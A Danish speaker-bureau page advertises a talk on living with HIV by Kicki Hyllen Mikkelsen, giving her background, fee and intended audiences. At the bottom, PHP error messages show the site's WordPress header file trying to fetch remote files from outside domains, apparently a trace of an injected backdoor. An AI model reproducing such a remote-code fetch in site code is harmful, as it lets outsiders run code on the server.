img-us
  • asc

    Foredragsholder Kicki Hyllen Mikkelsen

  • asc

    Emne ET LIV MED HIV

  • asc

    pris 5000.-

Jeg er hende der altid har hjulpet andre – særligt de svage, syge eller skæve eksistenser og derfor faldt det mig helt naturligt i en tidlig alder, at uddanne mig indenfor det sundhedsfaglige og arbejde i psykiatrien.


Alle skal føle sig set og hørt og behandles ordentligt. De skal mødes uden fordomme, med respekt og ses som et helt menneske, med deres egen særlige historie.


Historie

Jeg er en 40 årig kvinde, hustru og Mor til 3, som har arbejdede i psykiatrien i mere end 20 år og sætter en ære i, at gøre en forskel for nogle af vores svageste i samfundet.


I 2020 blev jeg ramt af en ordentlig mavepuster og skulle pludselig selv være patient med en kronisk sygdom – ovenikøbet en sygdom, der stadig er forbundet med uvidenhed, fordomme, stigma og skyld/skam.


Dette foredrag henvender sig til:
1. Studerende på alle uddannelsesinstitutioner
2. Fagpersoner/organisationer
3. Mennesker med kroniske sygdomme eller bare har brug for inspiration til, hvordan rejser man sig efter en krise
4. Forsikringsselskaber/politikkerer eller andre relevante ”aktører” man møder i dilemmaet omkring HIV

Om foredraget

Hvordan tackler man HIV-diagnosen og kommer videre i livet… Jeg vil bidrage med oplysning/viden om HIV og AIDS og bl.a. berører stigma, skyld/skam, krisen, tankerne – hvad vil andre tænke om mig?


Der er være viden og oplysning omkring HIV og AIDS, men vigtigst er min personlige historie og måden jeg har valgt at tackle det på, hvilket kan vække inspiration hos publikum i forhold til deres eget liv og eventuelle ønske om forandring.
SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag

Andre foredragsholdere

Thomas Dybro

Marlene Simoni

Christian Ryge

Nynne Bojsen


Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 410 Gone in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22